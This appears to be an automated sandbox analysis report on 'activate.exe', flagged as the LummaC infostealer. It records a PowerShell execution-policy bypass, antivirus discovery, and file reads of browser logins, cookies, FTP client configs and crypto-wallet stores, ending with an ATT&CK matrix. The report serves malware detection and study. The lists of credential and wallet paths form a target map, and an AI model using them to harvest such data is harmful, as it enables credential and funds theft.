Source: activate.exe, 00000000.00000003.1520257805.0000000006533000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\activate.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\activate.exe

Code function: 0_2_02EE01A3 LdrLoadDll,

0_2_02EE01A3

Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F10575 mov edx, dword ptr fs:[00000030h]	0_2_02F10575
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F10B35 mov eax, dword ptr fs:[00000030h]	0_2_02F10B35
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F10EE5 mov eax, dword ptr fs:[00000030h]	0_2_02F10EE5
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F11185 mov eax, dword ptr fs:[00000030h]	0_2_02F11185
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F11184 mov eax, dword ptr fs:[00000030h]	0_2_02F11184
Source: C:\Users\user\Desktop\activate.exe	Code function: 0_2_02F11B73 mov eax, dword ptr fs:[00000030h]	0_2_02F11B73

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\activate.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>pastebin.com - not found (#404)</title> </head> <body> <h1>not found (#404)</h1> <p>this page is no longer available. it has either expired, been removed by its creator, or removed by one of the pastebin staff.</p> </body> </html>_passw
Source: C:\Users\user\Desktop\activate.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>pastebin.com - not found (#404)</title> </head> <body> <h1>not found (#404)</h1> <p>this page is no longer available. it has either expired, been removed by its creator, or removed by one of the pastebin staff.</p> </body> </html>_passw			Jump to behavior

Source: C:\Users\user\Desktop\activate.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\activate.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: activate.exe, 00000000.00000003.1584217410.0000000002A44000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1601134243.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000002.3178041253.0000000002A44000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1577332953.0000000002A44000.00000004.00000020.00020000.00000000.sdmp, activate.exe, 00000000.00000003.1577332953.0000000002A67000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\activate.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 00000000.00000003.2215577787.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1583640019.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1584019025.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3179179419.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: activate.exe PID: 3036, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\activate.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\Desktop\activate.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 00000000.00000003.2215577787.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1583640019.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1584019025.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3179179419.0000000006442000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: activate.exe PID: 3036, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.3178632700.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	221 Virtualization/Sandbox Evasion	2 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
